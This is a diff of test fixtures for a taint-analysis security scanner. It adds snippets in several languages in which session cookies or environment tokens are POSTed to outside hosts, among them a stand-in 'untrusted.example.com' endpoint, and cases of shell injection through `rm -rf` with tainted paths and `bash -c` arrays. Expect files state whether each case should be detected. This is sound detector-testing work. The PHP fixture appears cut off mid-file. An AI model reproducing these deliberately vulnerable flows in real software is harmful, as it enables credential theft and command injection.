function leakBody(req) { - var payload = req.body.message; + var payload = req.cookies.session; fetch('/endpoint', { method: 'POST', body: payload, diff --git a/tests/fixtures/js/fetch_body_int_suppressed.js b/tests/fixtures/js/fetch_body_int_suppressed.js new file mode 100644 index 00000000..8119d1ba --- /dev/null +++ b/tests/fixtures/js/fetch_body_int_suppressed.js @@ -0,0 +1,19 @@ +// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced +// to an integer via `parseInt(...)` is NOT a credential payload; the +// resulting numeric body cannot encode a session token, header secret, or +// other exfiltratable material. The type-aware sink suppression in +// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the +// proven-`Int` SSA value at the gate and silences the cap. +// +// Negative regression: without DATA_EXFIL in the type-suppressible mask +// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })` +// pattern (e.g. analytics ingestion of session counters). +// +// Driven by `fetch_data_exfil_integration_tests.rs`. +function reportSessionCount(req) { + var count = parseInt(req.cookies.session_count, 10); + fetch('/metrics', { + method: 'POST', + body: count, + }); +} diff --git a/tests/fixtures/js/fetch_body_user_input_silenced.js b/tests/fixtures/js/fetch_body_user_input_silenced.js new file mode 100644 index 00000000..84ca93f8 --- /dev/null +++ b/tests/fixtures/js/fetch_body_user_input_silenced.js @@ -0,0 +1,15 @@ +// DATA_EXFIL silenced regression fixture: plain user input echoed into the +// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`. +// The user already controls `req.body.message` — surfacing it back into the +// request payload is not a cross-boundary disclosure. This is the canonical +// false-positive class for API gateways and telemetry forwarders that proxy +// `req.body`, killed by the source-sensitivity gate in `ast.rs`. 
+// +// Driven by `fetch_data_exfil_integration_tests.rs`. +function forward(req) { + var payload = req.body.message; + fetch('/endpoint', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js b/tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js new file mode 100644 index 00000000..bed375ca --- /dev/null +++ b/tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js @@ -0,0 +1,17 @@ +// DATA_EXFIL allowlist-suppression fixture. +// +// The destination URL has a static prefix (`https://api.internal/...`) that +// the test harness installs as a trusted destination via +// [detectors.data_exfil.trusted_destinations]. The body still carries a +// Sensitive source (`req.cookies.session`), but routing it through a known- +// trusted upstream is a *legitimate* forwarding pipeline: the cap is +// suppressed for this filter only. +// +// Driven by `fetch_data_exfil_suppression_tests.rs`. +function leakBody(req) { + var payload = req.cookies.session; + fetch('https://api.internal/forward', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/fixtures/js/fetch_data_exfil_external_destination.js b/tests/fixtures/js/fetch_data_exfil_external_destination.js new file mode 100644 index 00000000..396b4f12 --- /dev/null +++ b/tests/fixtures/js/fetch_data_exfil_external_destination.js @@ -0,0 +1,15 @@ +// DATA_EXFIL allowlist-NEGATIVE fixture. +// +// The destination URL prefix (`https://untrusted.example.com/`) is NOT +// covered by the harness-installed +// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST +// still fire on a Sensitive source flowing into the body. +// +// Driven by `fetch_data_exfil_suppression_tests.rs`. 
+function leakBodyExternal(req) { + var payload = req.cookies.session; + fetch('https://untrusted.example.com/intake', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js b/tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js new file mode 100644 index 00000000..bb9c57ee --- /dev/null +++ b/tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js @@ -0,0 +1,13 @@ +// DATA_EXFIL sanitizer-convention fixture. +// +// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source +// through a named telemetry boundary. The forwarding-wrapper convention +// (see docs/detectors/taint.md) treats `logEvent` as a default +// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call. +// +// Driven by `fetch_data_exfil_suppression_tests.rs`. +function track(req) { + logEvent({ + user: req.cookies.session, + }); +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c new file mode 100644 index 00000000..c0f1b77b --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c @@ -0,0 +1,13 @@ +#include <stdlib.h> +#include <curl/curl.h> + +void leak_env() { + char *token = getenv("AUTH_TOKEN"); + if (!token) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json new file mode 100644 index 00000000..da51bb01 --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the 
macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call (not at the CURLOPT_URL setopt above it). getenv(\"AUTH_TOKEN\") is Sensitivity::Sensitive so DATA_EXFIL must fire.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [4, 12], + "notes": "getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS." + } + ] +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c new file mode 100644 index 00000000..33231900 --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c @@ -0,0 +1,13 @@ +#include <stdio.h> +#include <curl/curl.h> + +void forward_stdin() { + char input[256]; + if (!fgets(input, sizeof(input), stdin)) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json new file mode 100644 index 00000000..1788906f --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets/stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. 
Pairs with data_exfil_curl_postfields.c to assert per-tier routing for C.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_not_match": true, + "line_range": [4, 12], + "notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration." + } + ] +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp new file mode 100644 index 00000000..6cfed7a3 --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp @@ -0,0 +1,13 @@ +#include <cstdlib> +#include <curl/curl.h> + +void leak_env() { + const char *token = std::getenv("AUTH_TOKEN"); + if (!token) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json new file mode 100644 index 00000000..5f5fb85f --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. 
std::getenv is Sensitivity::Sensitive so DATA_EXFIL must fire.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [4, 12], + "notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS." + } + ] +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp new file mode 100644 index 00000000..bd9c8213 --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp @@ -0,0 +1,13 @@ +#include <cstdio> +#include <curl/curl.h> + +void forward_stdin() { + char input[256]; + if (!fgets(input, sizeof(input), stdin)) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json new file mode 100644 index 00000000..511bc356 --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets from stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. 
Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_not_match": true, + "line_range": [4, 12], + "notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json new file mode 100644 index 00000000..3a405271 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json @@ -0,0 +1,19 @@ +{ + "description": "Container-taint DATA_EXFIL: tokens array pushed with req.cookies.session is JSON-stringified into a fetch body. The SSA heap Elements slot carries the cap from `tokens.push(...)` to the sink-side `collect_tainted_sink_values` heap-load, so DATA_EXFIL must fire on the body field even though `payload` itself is not directly tainted by an Assign.", + "tags": ["taint", "data-exfil", "fetch", "container", "heap-elements", "cookie", "edge-case"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [12, 17], + "notes": "tokens.push(req.cookies.session) → JSON.stringify({batch: tokens}) → fetch body. Heap Elements taint must round-trip through the container." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [12, 17], + "notes": "fetch URL is a fixed literal — body taint must not surface as SSRF." 
+ } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js new file mode 100644 index 00000000..8c2f4967 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js @@ -0,0 +1,21 @@ +var express = require('express'); +var app = express(); + +// Container-taint DATA_EXFIL: push a Sensitive cookie source into an +// array, then send the joined batch as the outbound `fetch` body. The +// SSA heap model marks the array's `Elements` slot tainted at the +// `tokens.push(...)` write; the sink-side `collect_tainted_sink_values` +// loads the same slot and observes the cap, so DATA_EXFIL must fire on +// the body channel even though the body var (`payload`) is not directly +// tainted. Pairs with `array_push_taint.js` (same shape, different +// sink: XSS). +app.post('/batch', function(req, res) { + var tokens = []; + tokens.push(req.cookies.session); + var payload = JSON.stringify({ batch: tokens }); + fetch('https://analytics.internal/track', { + method: 'POST', + body: payload, + }); + res.status(204).end(); +}); diff --git a/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json new file mode 100644 index 00000000..4a232ce4 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json @@ -0,0 +1,19 @@ +{ + "description": "Async/await DATA_EXFIL parity: an `await fetch(URL, {body: ...})` call with a Sensitive cookie source must fire DATA_EXFIL on the body field (no SSRF — destination is a fixed literal). 
Awaits do not strip taint; the cap split is preserved across the await edge identically to the synchronous fetch path.", + "tags": ["taint", "data-exfil", "fetch", "async", "await", "cookie", "edge-case"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [13, 16], + "notes": "req.cookies.session → JSON.stringify into await fetch body. Await must not silence the cap." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [13, 16], + "notes": "fetch URL is a fixed literal — body taint must not fire as SSRF." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js new file mode 100644 index 00000000..affa7934 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js @@ -0,0 +1,18 @@ +var express = require('express'); +var app = express(); + +// Async/await DATA_EXFIL: `await fetch(...)` must preserve the cap +// split. The destination URL is a fixed string literal (so SSRF must +// NOT fire) but a Sensitive cookie source threads through the body +// channel of the awaited call, so `Cap::DATA_EXFIL` MUST fire on the +// body field. Awaiting a Promise does not strip taint, the SSA lowering +// preserves chained await values across .then/.await edges identically +// to the synchronous fetch case. 
+app.post('/sync-async', async function (req, res) { + var sid = req.cookies.session; + await fetch('https://analytics.internal/track', { + method: 'POST', + body: JSON.stringify({ session: sid }), + }); + res.status(204).end(); +}); diff --git a/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json new file mode 100644 index 00000000..2f0d450f --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json @@ -0,0 +1,13 @@ +{ + "description": "Constructor cap narrowing: env secret flowing through `new Stripe(key)` must not propagate FILE_IO into the wrapper, so SDK-method-returned property values written to a file do not flag a phantom path-traversal flow.", + "tags": ["taint", "file_io", "constructor", "sdk", "negative", "regression-fp"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [9, 16], + "notes": "process.env.STRIPE_SECRET_KEY → new Stripe(key) → stripe.prices.create() → price.id → fs.writeFileSync — wrapper-object construction strips FILE_IO." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js new file mode 100644 index 00000000..bdd62479 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js @@ -0,0 +1,17 @@ +// Constructor cap narrowing: a third-party SDK client constructed from an +// env-derived secret returns objects whose string properties are +// SDK-generated, not derived from the secret in any path-shaped sense. +// `Cap::all()` flowing through `new Stripe(key)` must drop FILE_IO so +// downstream `fs.writeFileSync` of an SDK property does not flag a phantom +// path-traversal flow. 
+var fs = require('fs'); + +var key = process.env.STRIPE_SECRET_KEY; +var stripe = new Stripe(key); + +async function setup() { + var price = await stripe.prices.create({ unit_amount: 9599 }); + var line = 'PRICE_ID="' + price.id + '"'; + fs.writeFileSync('./out.env', line); +} +setup(); diff --git a/tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json new file mode 100644 index 00000000..14fb5250 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json @@ -0,0 +1,19 @@ +{ + "description": "Session-id forwarder: req.cookies.session (Sensitive-tier source) flows into a fixed-URL fetch body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Pairs with fetch_tainted_body_safe.js (Plain source, silenced) to assert the source-sensitivity gate routes per-tier rather than globally.", + "tags": ["taint", "data-exfil", "fetch", "sensitivity-gate", "cookie", "cap-attribution"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [10, 17], + "notes": "fetch URL is a fixed literal — body taint must not fire as SSRF." + }, + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [10, 17], + "notes": "req.cookies.session → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body field." 
+ } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/fetch_session_forward.js b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.js new file mode 100644 index 00000000..d1480653 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.js @@ -0,0 +1,18 @@ +var express = require('express'); +var app = express(); + +// Session-id forwarder: an internal handler proxies the user's session +// cookie into the body of an outbound request to a fixed analytics URL. +// The destination is hardcoded so SSRF must NOT fire, but the source is +// Sensitive-tier (cookie carries auth material) so Cap::DATA_EXFIL MUST +// fire — operator-bound state is leaving the process via the request +// payload. +app.get('/sync', function(req, res) { + var sid = req.cookies.session; + fetch('https://analytics.internal/track', { + method: 'POST', + headers: { 'Content-Type': 'application/json' }, + body: JSON.stringify({ session: sid }), + }); + res.status(204).end(); +}); diff --git a/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json b/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json index 0c42f768..8b495210 100644 --- a/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json +++ b/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json @@ -1,6 +1,6 @@ { - "description": "fetch() with a fixed destination URL and an attacker-controlled body. SSRF must NOT fire (destination is not attacker-influenced) and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) MUST fire on the body field.", - "tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution"], + "description": "fetch() with a fixed destination URL and a plain user-input body (req.body.message). 
SSRF must NOT fire (destination is not attacker-influenced) and DATA_EXFIL must NOT fire either: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL).", + "tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution", "sensitivity-gate"], "modes": ["full"], "expected": [ { @@ -11,9 +11,9 @@ }, { "rule_id": "taint-data-exfiltration", - "must_match": true, + "must_not_match": true, "line_range": [7, 14], - "notes": "Body field carries req.body.message → must fire DATA_EXFIL (sensitive data leaving the process via outbound request payload)." + "notes": "Body source is plain user input (req.body.message → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, headers, env, db, file) — plain user input echoed into a request body is not data exfiltration. See fetch_body_user_input_silenced.js for the unit-level regression." } ] } diff --git a/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json new file mode 100644 index 00000000..2f323896 --- /dev/null +++ b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_setopt($ch, CURLOPT_POSTFIELDS, $payload) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a define-style identifier via the macro-arg fallback, narrowing the gate so DATA_EXFIL fires only at the body-binding setopt call. The cookie source is Sensitivity::Sensitive so DATA_EXFIL must fire. 
The CURLOPT_RETURNTRANSFER setopt on the next line must NOT trigger the gate (different option, not a body slot).", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [3, 10], + "notes": "$_COOKIE['auth_token'] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_setopt body-binding call gated by CURLOPT_POSTFIELDS." + } + ] +} diff --git a/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php new file mode 100644 index 00000000..701bcd50 --- /dev/null +++ b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php @@ -0,0 +1,10 @@ + { + const files = req.body.files; + for (const [filePath, content] of Object.entries(files)) { + // TP: filePath is destructured from Object.entries(files) where files + // carries taint. Without the for-of pattern handler the binding + // is never registered as a definition and taint stops at `files`. 
+ exec(`rm -rf /tmp/${filePath}`); + } + res.send("ok"); +}); diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json new file mode 100644 index 00000000..7c9e0d5a --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json @@ -0,0 +1,38 @@ +{ + "description": "Regression guard: static shell payloads, non-shell arrays, canonical Dockerode argv, opaque array vars, and execSync(cmd, { env: process.env }) must not fire SHELL_ESCAPE.", + "tags": ["taint", "shell-injection", "shell-array", "regression-guard", "typescript"], + "modes": ["full"], + "strict_unexpected": ["taint-unsanitised-flow"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [13, 18], + "notes": "Constant shell payload — no idents in element 2, detector emits no sink filter." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [20, 26], + "notes": "First element is not a known shell — detector ignores even though element 2 is tainted." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [28, 34], + "notes": "Canonical Dockerode argv form — constant array, locked in by EXCLUDES." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [37, 43], + "notes": "Opaque variable, not a literal — detector inspects only literal arrays." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [46, 49], + "notes": "execSync(cmd, { env: process.env }) — arg 1 is the options object, not the command. Locked in by =execSync gate's payload_args: &[0]." 
+ } + ] +} diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts new file mode 100644 index 00000000..6ef21bcf --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts @@ -0,0 +1,52 @@ +// Negative regression: shell-arrays whose payload is a static literal must +// not fire (no taint can reach a constant), and array literals whose first +// element is not a known shell must not fire even with taint in element 2. +// Also locks in the four FPs documented in the recent EXCLUDES carve-out: +// the canonical Dockerode `container.exec({ Cmd: argv })` form, an opaque +// untainted-array variable, and `execSync(cmd, { env: process.env })`. +import Docker from "dockerode"; + +const docker = new Docker({ socketPath: "/var/run/docker.sock" }); + +async function inert(_id: string, _cmd: string[]): Promise<void> {} + +export async function staticShellPayload(req: any): Promise<void> { + // Constant payload — the third element is a literal string. Even though + // the array shape matches [bash, -c, *], no identifiers exist in element + // 2 so the detector emits no sink filter. + await inert("c", ["bash", "-c", "ls -la /app"]); +} + +export async function nonShellArray(req: any): Promise<void> { + const tainted = req.query.cmd; + // First element is not a known shell. Detector should not match even + // though element 2 carries taint. + await inert("c", ["ls", "-la", tainted]); +} + +export async function dockerodeCanonicalArgv( + containerId: string, + req: any +): Promise<void> { + const container = docker.getContainer(containerId); + // Canonical Dockerode shape: argv is passed directly to execve, no shell + // parsing. Constant array — must not fire, locked in by EXCLUDES. 
+ await container.exec({ Cmd: ["ls", "-la"], AttachStdout: true }); +} + +export async function dockerodeOpaqueArrayVar( + containerId: string, + argv: string[] +): Promise<void> { + const container = docker.getContainer(containerId); + // Variable, not literal — detector inspects only literal arrays. + await container.exec({ Cmd: argv, AttachStdout: true }); +} + +export async function execSyncWithEnv(_req: any): Promise<void> { + const { execSync } = require("child_process"); + // Existing carve-out: the env arg is never a shell-injection payload, the + // bare destructured-import `execSync` gate (=execSync) restricts + // payload_args to arg 0 (the command string). Locked in. + execSync("npx playwright test", { env: process.env }); +} diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json new file mode 100644 index 00000000..acbe0b30 --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json @@ -0,0 +1,14 @@ +{ + "description": "Shell-injection via [shell, '-c', tainted] array passed through a user-defined wrapper. Detection must fire at the array literal site without per-wrapper summary annotation.", + "tags": ["taint", "shell-injection", "shell-array", "typescript"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_match": true, + "line_range": [24, 29], + "evidence_contains": [], + "notes": "TP: req.query.name flows through the third array element of a [bash, -c, ...] shell-array passed to an opaque wrapper. The shell-array shape itself is the gate." 
+ } + ] +} diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts new file mode 100644 index 00000000..2f499edc --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts @@ -0,0 +1,31 @@ +// Reproduces the docker.ts pattern: a user-defined wrapper passes a shell-array +// literal to an opaque helper that ultimately invokes the shell. The taint +// vector is the third array element (the shell command string) — single-quote +// escaping in the interpolated `name` breaks out of the surrounding `'...'` +// and runs arbitrary commands. Detection must fire at the wrapper call site +// without needing any summary annotation on `runShellWrapper`. +import express from "express"; +const app = express(); + +async function runShellWrapper(_id: string, _cmd: string[]): Promise<string> { + // Opaque wrapper. In real code this dispatches to Dockerode + // `container.exec({Cmd: cmd})` — the shell-array recognition runs at the + // *outer* call site below, not here, because `container.exec` is excluded + // from flat sink classification on purpose (it accepts non-shell argv + // arrays in the canonical form). + return ""; +} + +app.get("/run", async (req: any, res: any) => { + const name = req.query.name; + // TP: `name` is interpolated inside a single-quoted shell context. A + // quote in `name` escapes the quoting and runs arbitrary shell commands. + // Detection must fire here, at the call site of the user wrapper, even + // though the wrapper is opaque to summary inference. 
+ await runShellWrapper("container-id", [ + "bash", + "-c", + `echo 'hello ${name}' > /tmp/out`, + ]); + res.send("ok"); +}); diff --git a/tests/ssa_equivalence_tests.rs b/tests/ssa_equivalence_tests.rs index b7888475..be234f06 100644 --- a/tests/ssa_equivalence_tests.rs +++ b/tests/ssa_equivalence_tests.rs @@ -769,6 +769,8 @@ fn orphan_catch_block_triggers_reachability_invariant() { exception_edges: vec![], // intentionally empty, the orphan condition, field_interner: nyx_scanner::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let err = check_catch_block_reachability(&body) @@ -830,6 +832,8 @@ fn normally_reachable_catch_block_passes_invariant() { exception_edges: vec![], field_interner: nyx_scanner::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert!(check_catch_block_reachability(&body).is_ok()); @@ -883,6 +887,8 @@ fn exception_edge_catch_block_passes_invariant() { exception_edges: vec![(BlockId(0), BlockId(1))], field_interner: nyx_scanner::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert!(check_catch_block_reachability(&body).is_ok());